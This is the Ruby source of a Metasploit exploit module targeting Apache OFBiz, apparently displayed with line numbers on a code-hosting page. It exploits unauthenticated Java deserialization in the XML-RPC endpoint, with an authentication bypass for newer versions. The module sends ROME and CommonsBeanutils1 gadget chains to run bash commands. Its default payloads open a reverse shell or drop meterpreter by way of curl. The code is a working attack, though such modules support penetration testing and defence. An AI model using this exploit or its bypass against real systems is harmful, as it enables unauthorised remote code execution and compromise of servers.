Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  Rank = ExcellentRanking
9

10
  prepend Msf::Exploit::Remote::AutoCheck
11
  include Msf::Exploit::Remote::HttpClient
12
  include Msf::Exploit::CmdStager
13
  include Msf::Exploit::JavaDeserialization
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Apache OFBiz XML-RPC Java Deserialization',
20
        'Description' => %q{
21
          This module exploits a Java deserialization vulnerability in Apache
22
          OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
23
          versions prior to 17.12.01 using the ROME gadget chain.
24

25
          Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
26
          and use the CommonsBeanutils1 gadget chain.
27

28
          Verified working on 18.12.09, 17.12.01, and 15.12
29
        },
30
        'Author' => [
31
          'Alvaro Muñoz', # Discovery
32
          'wvu', # Exploit
33
          'h00die' # cve-2023-49070
34
        ],
35
        'References' => [
36
          ['CVE', '2020-9496'],
37
          ['CVE', '2023-49070'], # auth bypass update
38
          ['CVE', '2023-51467'], # auth bypass update
39
          ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz'],
40
          ['URL', 'https://ofbiz.apache.org/release-notes-17.12.04.html'],
41
          ['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716'],
42
          ['URL', 'https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/'] # auth bypass
43
        ],
44
        'DisclosureDate' => '2020-07-13', # Vendor release note
45
        'License' => MSF_LICENSE,
46
        'Platform' => ['unix', 'linux'],
47
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
48
        'Privileged' => false,
49
        'Targets' => [
50
          [
51
            'Unix Command',
52
            {
53
              'Platform' => 'unix',
54
              'Arch' => ARCH_CMD,
55
              'Type' => :unix_cmd,
56
              'DefaultOptions' => {
57
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
58
              }
59
            }
60
          ],
61
          [
62
            'Linux Dropper',
63
            {
64
              'Platform' => 'linux',
65
              'Arch' => [ARCH_X86, ARCH_X64],
66
              'Type' => :linux_dropper,
67
              'DefaultOptions' => {
68
                'CMDSTAGER::FLAVOR' => :curl,
69
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
70
              }
71
            }
72
          ]
73
        ],
74
        'DefaultTarget' => 1,
75
        'DefaultOptions' => {
76
          'SSL' => true
77
        },
78
        'Notes' => {
79
          'Stability' => [CRASH_SAFE],
80
          'Reliability' => [REPEATABLE_SESSION],
81
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
82
        }
83
      )
84
    )
85

86
    register_options([
87
      Opt::RPORT(8443),
88
      OptString.new('TARGETURI', [true, 'Base path', '/']),
89
    ])
90
  end
91

92
  # attempt to determine the version number. This attempt is flawed on versions
93
  # < 17. 17+ has the Release on the /webtools/control/xmlrpc page. This page
94
  # doesn't exist on versions < 17, so we just return back 'pre-17'
95
  def version_from_login_page
96
    res = send_request_cgi({
97
      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc')
98
    })
99
    return nil if res.nil?
100
    return 'pre-17' unless res.code == 200
101
    # https://rubular.com/r/vputt9uJecevOk
102
    if res.body =~ %r{Apache OFBiz\.</a> Release\s+(?:release)?([\d.]+)}
103
      return Regexp.last_match(1).strip
104
    end
105

106
    'unknown'
107
  end
108

109
  def check
110
    # Send an empty serialized object
111
    res = send_request_xmlrpc('')
112

113
    return CheckCode::Unknown('Target did not respond to check.') unless res
114

115
    if res.body.include?('Failed to read result object: null')
116
      @version = 'pre-17'
117
      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
118
    end
119

120
    # newer @versions respond w/o a content length, so just validate the URL returns something that looks like OFBiz
121
    @version = version_from_login_page
122

123
    return CheckCode::Unknown('Target did not respond to check.') if @version.nil?
124
    return CheckCode::Unknown('Target version could not be determined') if @version == 'unknown'
125

126
    return CheckCode::Appears('Apache OFBiz pre version 17 detected') if @version == 'pre-17'
127
    return CheckCode::Appears("Apache OFBiz version #{@version} detected") if Rex::Version.new(@version) < Rex::Version.new('18.12.11')
128

129
    CheckCode::Safe("Apache OFBiz version #{@version} detected, and is unexploitable")
130
  end
131

132
  def exploit
133
    @version = version_from_login_page if @version.nil?
134

135
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
136

137
    case target['Type']
138
    when :unix_cmd
139
      execute_command(payload.encoded)
140
    when :linux_dropper
141
      execute_cmdstager
142
    end
143
  end
144

145
  def execute_command(cmd, _opts = {})
146
    vprint_status("Executing command: #{cmd}")
147

148
    if @version == 'pre-17'
149
      vprint_status('Utilizing ROME deserialization chain')
150
      res = send_request_xmlrpc(
151
        # framework/webapp/lib/rome-0.9.jar
152
        # used with 15.12, but not 18.12 compatible
153
        generate_java_deserialization_for_command('ROME', 'bash', cmd)
154
      )
155
    else
156
      vprint_status('Utilizing CommonsBeanutils1 deserialization chain')
157
      res = send_request_xmlrpc(
158
        # framework/webapp/lib/rome-0.9.jar
159
        # used with 18.12 compatible, but not 15.12 compatible
160
        generate_java_deserialization_for_command('CommonsBeanutils1', 'bash', cmd) # works against both
161
      )
162
    end
163

164
    unless res && res.code == 200
165
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
166
    end
167

168
    print_good("Successfully executed command: #{cmd}")
169
  end
170

171
  def send_request_xmlrpc(data)
172
    # http://xmlrpc.com/
173
    # https://ws.apache.org/xmlrpc/
174
    request = {
175
      'method' => 'POST',
176
      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),
177
      'ctype' => 'text/xml',
178
      'data' => <<~XML
179
        <?xml version="1.0"?>
180
        <methodCall>
181
          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>
182
          <params>
183
            <param>
184
              <value>
185
                <struct>
186
                  <member>
187
                    <name>#{rand_text_alphanumeric(8..42)}</name>
188
                    <value>
189
                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>
190
                    </value>
191
                  </member>
192
                </struct>
193
              </value>
194
            </param>
195
          </params>
196
        </methodCall>
197
      XML
198
    }
199

200
    unless @version == 'pre-17'
201
      request['uri'] = normalize_uri(target_uri.path, '/webtools/control/xmlrpc;/') # tack on ;/
202
      request['vars_get'] = {
203
        'USERNAME' => '',
204
        'PASSWORD' => rand_text_alphanumeric(1..5),
205
        'requirePasswordChange' => 'Y' # magic bypass string
206
      }
207
    end
208

209
    send_request_cgi(request)
210
  end
211

212
end
213

214